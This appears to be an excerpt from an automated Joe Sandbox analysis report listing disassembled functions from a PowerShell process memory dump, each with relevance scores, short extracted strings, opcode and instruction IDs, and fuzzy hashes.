                                      • Opcode Fuzzy Hash: 228ae2545aedfa748641e31d1d6a025c7377c336e4a3d0fa1fc642c780c33f4e
                                      • Instruction Fuzzy Hash: C6122FB5A103159FDB24DF24C950BEEB7B2EF89304F5080A9D4096B395CB76AE81CF91
                                      Function 07202970 Relevance: 5.3, Strings: 4, Instructions: 271COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 84m$84m$tPq$tPq
                                      • API String ID: 0-2296983684
                                      • Opcode ID: 638605d6c2134f433c3f02dbf4b86588da72730e0c464f74959e3de279ac83d2
                                      • Instruction ID: 55badefdbdf1230055bd274f16c5e2c696d575ae1c5ba0a0604792a05b4993bc
                                      • Opcode Fuzzy Hash: 638605d6c2134f433c3f02dbf4b86588da72730e0c464f74959e3de279ac83d2
                                      • Instruction Fuzzy Hash: 41914A71720206DFD7288E69894876AB7E7BF89610F18846BD845DB2D2CA31DC41C7F1
                                      Function 0720A740 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $q$$q$$q$$q
                                      • API String ID: 0-4102054182
                                      • Opcode ID: df8f0ed5ec4d8651859ddc7d37f964bc1e5752bc4d5aa5377dbab8e4b459ac81
                                      • Instruction ID: 219965e0489f87f5e2a4e751c1a491bc6aafee3123e8e0a1e3f2662c30bc5c06
                                      • Opcode Fuzzy Hash: df8f0ed5ec4d8651859ddc7d37f964bc1e5752bc4d5aa5377dbab8e4b459ac81
                                      • Instruction Fuzzy Hash: 7B2129B27303079BEB34596A8D48B3BB6FA9BC4615F64C02AA405CB3D3DD75D84183B1
                                      Function 07207674 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $q$$q$$q$$q
                                      • API String ID: 0-4102054182
                                      • Opcode ID: b0c74a33ce9bb0e8495510ffefc00f8329d76ec977232ba84f01a4803273e9ca
                                      • Instruction ID: 32c9f525f990074d70fec358350cff63f6a082ec8cac77cb9d3407ed926bb0b0
                                      • Opcode Fuzzy Hash: b0c74a33ce9bb0e8495510ffefc00f8329d76ec977232ba84f01a4803273e9ca
                                      • Instruction Fuzzy Hash: A921E2B59243078FDF218E688A042B6BBB5AF45650F18807EC4059B393D774E544CBF1
                                      Function 07200308 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$$q$$q
                                      • API String ID: 0-3199993180
                                      • Opcode ID: d93dd22faeda2aa975e987aadeeffc91073c0446366172fa9779245b4b5f05db
                                      • Instruction ID: 323fdff88a2d0f548689508702d8ffe259028c07b22c40c7b3d8a37c371a8e9e
                                      • Opcode Fuzzy Hash: d93dd22faeda2aa975e987aadeeffc91073c0446366172fa9779245b4b5f05db
                                      • Instruction Fuzzy Hash: B001715162D3D64BE72717690920219AFB21F83540B1980D7C085DF2E3CAA58D0987A3